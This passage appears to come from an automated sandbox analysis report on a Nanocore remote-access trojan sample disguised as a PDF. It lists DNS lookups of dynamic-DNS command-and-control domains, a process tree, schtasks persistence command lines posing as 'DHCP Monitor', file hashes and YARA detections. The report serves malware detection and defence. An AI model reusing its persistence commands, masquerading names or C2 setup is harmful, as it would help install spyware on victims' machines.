              Feb 3, 2023 17:55:05.210943937 CET53536378.8.8.8192.168.2.7
              Feb 3, 2023 17:55:13.758878946 CET5834353192.168.2.78.8.8.8
              Feb 3, 2023 17:55:13.865463018 CET53583438.8.8.8192.168.2.7
              Feb 3, 2023 17:55:20.557543993 CET6201853192.168.2.78.8.8.8
              Feb 3, 2023 17:55:20.577339888 CET53620188.8.8.8192.168.2.7
              Feb 3, 2023 17:55:27.259848118 CET5015553192.168.2.78.8.8.8
              Feb 3, 2023 17:55:27.279320955 CET53501558.8.8.8192.168.2.7

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Feb 3, 2023 17:52:09.443150997 CET192.168.2.78.8.8.80xebe5Standard query (0)december2n.duckdns.orgA (IP address)IN (0x0001)false
              Feb 3, 2023 17:52:16.610014915 CET192.168.2.78.8.8.80x5828Standard query (0)december2n.duckdns.orgA (IP address)IN (0x0001)false
              Feb 3, 2023 17:52:25.314857960 CET192.168.2.78.8.8.80x3e16Standard query (0)december2n.duckdns.orgA (IP address)IN (0x0001)false
              Feb 3, 2023 17:52:32.281383038 CET192.168.2.78.8.8.80x5585Standard query (0)december2nd.ddns.netA (IP address)IN (0x0001)false
              Feb 3, 2023 17:52:39.102504015 CET192.168.2.78.8.8.80x1074Standard query (0)december2nd.ddns.netA (IP address)IN (0x0001)false
              Feb 3, 2023 17:52:46.786912918 CET192.168.2.78.8.8.80xc899Standard query (0)december2nd.ddns.netA (IP address)IN (0x0001)false
              Feb 3, 2023 17:52:53.769855976 CET192.168.2.78.8.8.80x1b1fStandard query (0)december2n.duckdns.orgA (IP address)IN (0x0001)false
              Feb 3, 2023 17:53:02.823585987 CET192.168.2.78.8.8.80x4c8eStandard query (0)december2n.duckdns.orgA (IP address)IN (0x0001)false
              Feb 3, 2023 17:53:09.590004921 CET192.168.2.78.8.8.80x2d8cStandard query (0)december2n.duckdns.orgA (IP address)IN (0x0001)false
              Feb 3, 2023 17:53:16.469430923 CET192.168.2.78.8.8.80x8848Standard query (0)december2nd.ddns.netA (IP address)IN (0x0001)false
              Feb 3, 2023 17:53:23.915457010 CET192.168.2.78.8.8.80x297bStandard query (0)december2nd.ddns.netA (IP address)IN (0x0001)false
              Feb 3, 2023 17:53:30.759666920 CET192.168.2.78.8.8.80xc6ecStandard query (0)december2nd.ddns.netA (IP address)IN (0x0001)false
              Feb 3, 2023 17:53:40.419250965 CET192.168.2.78.8.8.80xda46Standard query (0)december2n.duckdns.orgA (IP address)IN (0x0001)false
              Feb 3, 2023 17:53:47.239336967 CET192.168.2.78.8.8.80xa48Standard query (0)december2n.duckdns.orgA (IP address)IN (0x0001)false
              Feb 3, 2023 17:53:53.936758995 CET192.168.2.78.8.8.80x13d7Standard query (0)december2n.duckdns.orgA (IP address)IN (0x0001)false
              Feb 3, 2023 17:54:01.462042093 CET192.168.2.78.8.8.80xfc42Standard query (0)december2nd.ddns.netA (IP address)IN (0x0001)false
              Feb 3, 2023 17:54:08.436933994 CET192.168.2.78.8.8.80x3b17Standard query (0)december2nd.ddns.netA (IP address)IN (0x0001)false
              Feb 3, 2023 17:54:15.322606087 CET192.168.2.78.8.8.80x4790Standard query (0)december2nd.ddns.netA (IP address)IN (0x0001)false
              Feb 3, 2023 17:54:22.567852020 CET192.168.2.78.8.8.80x2a56Standard query (0)december2n.duckdns.orgA (IP address)IN (0x0001)false
              Feb 3, 2023 17:54:29.466197014 CET192.168.2.78.8.8.80xb3aeStandard query (0)december2n.duckdns.orgA (IP address)IN (0x0001)false
              Feb 3, 2023 17:54:36.820679903 CET192.168.2.78.8.8.80x62adStandard query (0)december2n.duckdns.orgA (IP address)IN (0x0001)false
              Feb 3, 2023 17:54:44.068591118 CET192.168.2.78.8.8.80x2ae6Standard query (0)december2nd.ddns.netA (IP address)IN (0x0001)false
              Feb 3, 2023 17:54:50.906075954 CET192.168.2.78.8.8.80x9387Standard query (0)december2nd.ddns.netA (IP address)IN (0x0001)false
              Feb 3, 2023 17:54:57.821435928 CET192.168.2.78.8.8.80xfa40Standard query (0)december2nd.ddns.netA (IP address)IN (0x0001)false
              Feb 3, 2023 17:55:05.101567984 CET192.168.2.78.8.8.80x1982Standard query (0)december2n.duckdns.orgA (IP address)IN (0x0001)false
              Feb 3, 2023 17:55:13.758878946 CET192.168.2.78.8.8.80xb7d7Standard query (0)december2n.duckdns.orgA (IP address)IN (0x0001)false
              Feb 3, 2023 17:55:20.557543993 CET192.168.2.78.8.8.80x53ecStandard query (0)december2n.duckdns.orgA (IP address)IN (0x0001)false
              Feb 3, 2023 17:55:27.259848118 CET192.168.2.78.8.8.80x4cb8Standard query (0)december2nd.ddns.netA (IP address)IN (0x0001)false

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Feb 3, 2023 17:52:09.550913095 CET8.8.8.8192.168.2.70xebe5No error (0)december2n.duckdns.org212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:52:16.726582050 CET8.8.8.8192.168.2.70x5828No error (0)december2n.duckdns.org212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:52:25.424727917 CET8.8.8.8192.168.2.70x3e16No error (0)december2n.duckdns.org212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:52:32.303405046 CET8.8.8.8192.168.2.70x5585No error (0)december2nd.ddns.net212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:52:39.124073029 CET8.8.8.8192.168.2.70x1074No error (0)december2nd.ddns.net212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:52:46.806299925 CET8.8.8.8192.168.2.70xc899No error (0)december2nd.ddns.net212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:52:53.789580107 CET8.8.8.8192.168.2.70x1b1fNo error (0)december2n.duckdns.org212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:53:02.841408968 CET8.8.8.8192.168.2.70x4c8eNo error (0)december2n.duckdns.org212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:53:09.609643936 CET8.8.8.8192.168.2.70x2d8cNo error (0)december2n.duckdns.org212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:53:16.487303972 CET8.8.8.8192.168.2.70x8848No error (0)december2nd.ddns.net212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:53:23.933341980 CET8.8.8.8192.168.2.70x297bNo error (0)december2nd.ddns.net212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:53:30.779515982 CET8.8.8.8192.168.2.70xc6ecNo error (0)december2nd.ddns.net212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:53:40.527806997 CET8.8.8.8192.168.2.70xda46No error (0)december2n.duckdns.org212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:53:47.348970890 CET8.8.8.8192.168.2.70xa48No error (0)december2n.duckdns.org212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:53:53.954144955 CET8.8.8.8192.168.2.70x13d7No error (0)december2n.duckdns.org212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:54:01.481538057 CET8.8.8.8192.168.2.70xfc42No error (0)december2nd.ddns.net212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:54:08.458302975 CET8.8.8.8192.168.2.70x3b17No error (0)december2nd.ddns.net212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:54:15.342376947 CET8.8.8.8192.168.2.70x4790No error (0)december2nd.ddns.net212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:54:22.587543011 CET8.8.8.8192.168.2.70x2a56No error (0)december2n.duckdns.org212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:54:29.579541922 CET8.8.8.8192.168.2.70xb3aeNo error (0)december2n.duckdns.org212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:54:36.838251114 CET8.8.8.8192.168.2.70x62adNo error (0)december2n.duckdns.org212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:54:44.086455107 CET8.8.8.8192.168.2.70x2ae6No error (0)december2nd.ddns.net212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:54:50.928325891 CET8.8.8.8192.168.2.70x9387No error (0)december2nd.ddns.net212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:54:57.844635010 CET8.8.8.8192.168.2.70xfa40No error (0)december2nd.ddns.net212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:55:05.210943937 CET8.8.8.8192.168.2.70x1982No error (0)december2n.duckdns.org212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:55:13.865463018 CET8.8.8.8192.168.2.70xb7d7No error (0)december2n.duckdns.org212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:55:20.577339888 CET8.8.8.8192.168.2.70x53ecNo error (0)december2n.duckdns.org212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:55:27.279320955 CET8.8.8.8192.168.2.70x4cb8No error (0)december2nd.ddns.net212.193.30.230A (IP address)IN (0x0001)false

              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              General

              Target ID:0
              Start time:17:51:27
              Start date:03/02/2023
              Path:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              Imagebase:0x3d0000
              File size:1181640 bytes
              MD5 hash:3AC05BBE35293FBFD0DF49ECFB34C461
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low

              General

              Target ID:1
              Start time:17:51:39
              Start date:03/02/2023
              Path:C:\Windows\SysWOW64\wscript.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\System32\wscript.exe" laklj-aowdkfxknm.xml.vbe
              Imagebase:0xd10000
              File size:147456 bytes
              MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Target ID:6
              Start time:17:51:49
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe" ccmbpoh.docx
              Imagebase:0xba0000
              File size:1357068 bytes
              MD5 hash:797174324A2A71F55AD4E89DA918B52D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              Antivirus matches:
              • Detection: 100%, Avira
              • Detection: 26%, ReversingLabs
              Reputation:low

              General

              Target ID:10
              Start time:17:51:58
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
              Imagebase:0x360000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, Author: ditekSHen
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              Reputation:high

              General

              Target ID:11
              Start time:17:52:02
              Start date:03/02/2023
              Path:C:\Windows\SysWOW64\schtasks.exe
              Wow64 process (32bit):true
              Commandline:schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmp
              Imagebase:0xef0000
              File size:185856 bytes
              MD5 hash:15FF7D8324231381BAD48A052F85DF04
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Target ID:12
              Start time:17:52:02
              Start date:03/02/2023
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6edaf0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Target ID:13
              Start time:17:52:03
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe 0
              Imagebase:0x10000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Reputation:high

              General

              Target ID:14
              Start time:17:52:03
              Start date:03/02/2023
              Path:C:\Windows\SysWOW64\schtasks.exe
              Wow64 process (32bit):true
              Commandline:schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmpAA3C.tmp
              Imagebase:0xef0000
              File size:185856 bytes
              MD5 hash:15FF7D8324231381BAD48A052F85DF04
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Target ID:15
              Start time:17:52:04
              Start date:03/02/2023
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6edaf0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:16
              Start time:17:52:04
              Start date:03/02/2023
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6edaf0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:17
              Start time:17:52:06
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
              Imagebase:0xba0000
              File size:1357068 bytes
              MD5 hash:797174324A2A71F55AD4E89DA918B52D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

              General

              Target ID:18
              Start time:17:52:07
              Start date:03/02/2023
              Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              Wow64 process (32bit):true
              Commandline:"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0
              Imagebase:0x710000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Antivirus matches:
              • Detection: 0%, ReversingLabs

              General

              Target ID:19
              Start time:17:52:07
              Start date:03/02/2023
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
